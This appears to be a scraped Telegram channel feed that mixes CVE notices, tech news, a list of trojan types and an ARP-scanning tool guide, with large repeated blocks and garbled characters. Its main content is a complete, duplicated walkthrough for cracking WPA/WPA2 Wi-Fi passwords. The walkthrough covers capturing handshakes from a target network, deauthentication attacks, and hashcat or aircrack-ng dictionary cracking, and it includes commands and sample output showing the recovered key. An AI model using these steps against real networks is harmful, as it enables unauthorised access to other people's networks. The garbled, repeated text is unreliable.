Forwarded from UNDERCODE NEWS
At least 2 Xbox masterpieces that were not yet announced in 2021 will be open to Microsoft.
#Technologies
#Technologies
Forwarded from DailyCVE
π΅Unpatched dada accelerator has binary vulnerability (DC 208-2021)
https://dailycve.com/unpatched-dada-accelerator-has-binary-vulnerability-0
https://dailycve.com/unpatched-dada-accelerator-has-binary-vulnerability-0
Dailycve
Unpatched dada accelerator has binary vulnerability | CVE
Details:
DaDa accelerator is an online game accelerator tool of high quality built for the majority of gamers.
There is a binary weakness in the DaDa accelerator. The intruder will use the built software to trigger the blue screen of the machine toβ¦
Forwarded from DailyCVE
π΅Upatched UCMS backend ai***.php file has SQL injection vulnerability (DC: 209-2021)
https://dailycve.com/upatched-ucms-backend-aiphp-file-has-sql-injection-vulnerability
https://dailycve.com/upatched-ucms-backend-aiphp-file-has-sql-injection-vulnerability
Dailycve
Upatched UCMS backend ai***.php file has SQL injection vulnerability | CVE
Details:
UCMS is a series of content management systems written in the language of PHP.
In the ai***.php file in the UCMS backend, a SQL injection flaw occurs. Vulnerabilities may be exploited by attackers to access personal information in the databaseβ¦
Forwarded from UNDERCODER
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat:
Begin by listing wireless interfaces that support monitor mode with:
A) airmon-ng
If you do not see an interface listed then your wireless card does not support monitor mode π
We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:
airmon-ng start wlan0
Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).
B) Find Your Target
Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:
airodump-ng mon0
You should see output similar to what is below.
C) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.
π¦Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat:
Begin by listing wireless interfaces that support monitor mode with:
A) airmon-ng
If you do not see an interface listed then your wireless card does not support monitor mode π
We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:
airmon-ng start wlan0
Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).
B) Find Your Target
Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:
airodump-ng mon0
You should see output similar to what is below.
C) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.
Forwarded from UNDERCODER
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
D) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
E) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
mv ./-01.cap hackme.cap
Crack the Network Password
E) The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
F) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
Where the last two fields separated by : are the network name and password respectively.
If you would like to use hashcat without naive-hashcat see this page for info.
F) Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file
β β β Uππ»βΊπ«Δπ¬πβ β β β
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
D) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
E) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
mv ./-01.cap hackme.cap
Crack the Network Password
E) The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
F) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
Where the last two fields separated by : are the network name and password respectively.
If you would like to use hashcat without naive-hashcat see this page for info.
F) Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file
β β β Uππ»βΊπ«Δπ¬πβ β β β
hashcat.net
hashcat cap2hccapx - advanced password recovery
CAP-to-HCCAPX online converter page for WPA/WPA2
Forwarded from UNDERCODER
# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordfile you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
References: github, Ru foro
β β β Uππ»βΊπ«Δπ¬πβ β β β
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordfile you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
References: github, Ru foro
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from DailyCVE
π΅Unpatched 360 security desktop has dll hijacking vulnerability (DC: 210-2021)
https://dailycve.com/unpatched-360-security-desktop-has-dll-hijacking-vulnerability
https://dailycve.com/unpatched-360-security-desktop-has-dll-hijacking-vulnerability
Dailycve
Unpatched 360 security desktop has dll hijacking vulnerability | CVE
Details:
To help you properly arrange your computer's desktop documentation and configurations, 360 Secure Desktop is a desktop application management program.
In 360 Protected Desktop, there is a DLL hijacking flaw that can be used to run maliciousβ¦
Forwarded from DailyCVE
Dailycve
Malwarebytes security breach | CVE
Details:
Malwarebytes is a US Malwarebytes software program that provides computers with anti-malware features. The program is designed to survive malicious malware such as bugs, spyware, Trojan horses, worms, dialers, etc. On macOS, Malwarebytes beforeβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python Scapy tools developed for LAN tests and advanced reconnaissance.:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pip3 install scapy
2) pip3 install netaddr
3) git clone https://github.com/peppelinux/pyLAN-tools.git
4) : arpscan.py [-h] -i I [-r R [R ...]] [-t T]
[-exclude EXCLUDE [EXCLUDE ...]] [-only ONLY [ONLY ...]]
[-debug]
arpscan usage examples
5) # scans only selected peers in the local network reachable on eth2 interface
6) python2 arpscan.py -i eth2 -t 0.01 -only 1 2 3 4 5 6 7 8 9 10 50 150 200 250 251 252 253 254
10.21.0.75 bc:5f:f4:f4:d0:d9 (eth2)
10.21.0.254 d4:ca:6d:e6:6a:d7
# scans only selected networks
python2 arpscan.py -i eth2 -t 0.01 -r 192.168.0.0/24 192.168.1.0/24 172.17.0.0/12
192.168.1.1 08:00:27:7c:f9:41
7) arpscan todo
parallelization with subprocess per every -r lan (performance improvements)
8) choose a number of worker to delegate a subset of addresses (address_pool/num_workers)
vendor database intergration and representation (as netdiscover already does)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python Scapy tools developed for LAN tests and advanced reconnaissance.:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pip3 install scapy
2) pip3 install netaddr
3) git clone https://github.com/peppelinux/pyLAN-tools.git
4) : arpscan.py [-h] -i I [-r R [R ...]] [-t T]
[-exclude EXCLUDE [EXCLUDE ...]] [-only ONLY [ONLY ...]]
[-debug]
arpscan usage examples
5) # scans only selected peers in the local network reachable on eth2 interface
6) python2 arpscan.py -i eth2 -t 0.01 -only 1 2 3 4 5 6 7 8 9 10 50 150 200 250 251 252 253 254
10.21.0.75 bc:5f:f4:f4:d0:d9 (eth2)
10.21.0.254 d4:ca:6d:e6:6a:d7
# scans only selected networks
python2 arpscan.py -i eth2 -t 0.01 -r 192.168.0.0/24 192.168.1.0/24 172.17.0.0/12
192.168.1.1 08:00:27:7c:f9:41
7) arpscan todo
parallelization with subprocess per every -r lan (performance improvements)
8) choose a number of worker to delegate a subset of addresses (address_pool/num_workers)
vendor database intergration and representation (as netdiscover already does)
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
peppelinux/pyLAN-tools
LAN hacking tools with Python and Scapy. Contribute to peppelinux/pyLAN-tools development by creating an account on GitHub.
Forwarded from DailyCVE
π΅Unpatched binary vulnerability exists in ABC viewing software(DC: 212-2021)
https://dailycve.com/unpatched-binary-vulnerability-exists-abc-viewing-software
https://dailycve.com/unpatched-binary-vulnerability-exists-abc-viewing-software
Dailycve
Unpatched binary vulnerability exists in ABC viewing software | CVE
Details:
ABC Picture Viewer is a permanently free program for image viewing that turns on hardware acceleration intelligently and supports multiple image formats.
In the ABC picture watching program, there is a binary flaw which can be abused by attackersβ¦
Forwarded from DailyCVE
π΅Unpatched WPS Office has a denial of service vulnerability(DC 213-2021)
https://dailycve.com/wps-office-has-denial-service-vulnerability-0
https://dailycve.com/wps-office-has-denial-service-vulnerability-0
Forwarded from UNDERCODE NEWS
Apple drops exclusive features from its own software that it has illegally inserted as public sentiment deteriorates.
#Vulnerabilities
#Vulnerabilities
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Trojan Horse Programs
(1) Blackmail Trojan
This type of Trojan will encrypt, destroy, modify, copy, lock, and delete data. This type of Trojan uses the data in the user's system as a condition of extortion and releases it after the user pays the ransom.
(2) Mail-Finder Trojan
The task of this type of Trojan is to find all email contacts from its target email client. The Trojan can send the list to its creator. In some cases, phishing emails are used to forward themselves to these contacts through phishing emails without the victimβs knowledge, thereby self-propagating.
(3) Fake anti-virus Trojan horse
Such Trojans will send false messages to users informing them that their devices have been infected with viruses. Sometimes complex reports and scan results are used to show a high level of threat, making users panic. Then, the Trojan horse author charges users for virus removal services.
(4) Download Trojan
The purpose of this type of Trojan is to download other malware from the Internet without the device ownerβs knowledge.
(5) Botnet Trojan
Botnet Trojan horses are used to damage web browsers, infect other devices, force them to join the botnet army, and execute various cyber crimes.
(6) Backdoor/remote access Trojan
This type of Trojan allows cybercriminals to remotely access and control the intruding device, such as:
Access and modify files;
Restart the target system;
Install or uninstall other software;
Send and receive information with other connected IoT devices;
Get many other similar privileges.
(7) Spy Trojan
This type of Trojan, also known as spyware, monitors user behavior, such as surfing the Internet and what users type on websites and devices (such as personal information, financial data, login credentials, etc.). This information will then be used to perform identity theft crimes, financial fraud or ransomware attacks.
π¦Trojan Horse Programs
(1) Blackmail Trojan
This type of Trojan will encrypt, destroy, modify, copy, lock, and delete data. This type of Trojan uses the data in the user's system as a condition of extortion and releases it after the user pays the ransom.
(2) Mail-Finder Trojan
The task of this type of Trojan is to find all email contacts from its target email client. The Trojan can send the list to its creator. In some cases, phishing emails are used to forward themselves to these contacts through phishing emails without the victimβs knowledge, thereby self-propagating.
(3) Fake anti-virus Trojan horse
Such Trojans will send false messages to users informing them that their devices have been infected with viruses. Sometimes complex reports and scan results are used to show a high level of threat, making users panic. Then, the Trojan horse author charges users for virus removal services.
(4) Download Trojan
The purpose of this type of Trojan is to download other malware from the Internet without the device ownerβs knowledge.
(5) Botnet Trojan
Botnet Trojan horses are used to damage web browsers, infect other devices, force them to join the botnet army, and execute various cyber crimes.
(6) Backdoor/remote access Trojan
This type of Trojan allows cybercriminals to remotely access and control the intruding device, such as:
Access and modify files;
Restart the target system;
Install or uninstall other software;
Send and receive information with other connected IoT devices;
Get many other similar privileges.
(7) Spy Trojan
This type of Trojan, also known as spyware, monitors user behavior, such as surfing the Internet and what users type on websites and devices (such as personal information, financial data, login credentials, etc.). This information will then be used to perform identity theft crimes, financial fraud or ransomware attacks.
(don't copy any tutorial)β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from DailyCVE
π΅Joomla! Cross-site scripting vulnerability :
https://dailycve.com/joomla-cross-site-scripting-vulnerability
https://dailycve.com/joomla-cross-site-scripting-vulnerability
Dailycve
Joomla! Cross-site scripting vulnerability | CVE
Details:
Joomla! is a world-renowned content management system. This is a software framework developed using the language of PHP and the database of MySQL. It will run on different platforms, including Linux, Windows, and MacOSX.
Hey! Joomla! 3.1.0β¦
Forwarded from DailyCVE
π΅Unpatched Awbs Advanced Webhost Billing System cross-site request forgery vulnerability:
https://dailycve.com/unpatched-awbs-advanced-webhost-billing-system-cross-site-request-forgery-vulnerability
https://dailycve.com/unpatched-awbs-advanced-webhost-billing-system-cross-site-request-forgery-vulnerability
Dailycve
Unpatched Awbs Advanced Webhost Billing System cross-site request forgery vulnerability | CVE
Details:
Awbs Advanced Webhost Billing System is a network billing management system based on Php, used in the United States to handle Awbs hosts. The platform can offer commercial facilities for web hosting and/or domain name registration, and can provideβ¦
Forwarded from UNDERCODE NEWS
German privacy agency reported that an online laptop and electronics store was fined EUR 10.4 million for staff control in breach of GDPR.
#International
#International
Forwarded from UNDERCODE NEWS
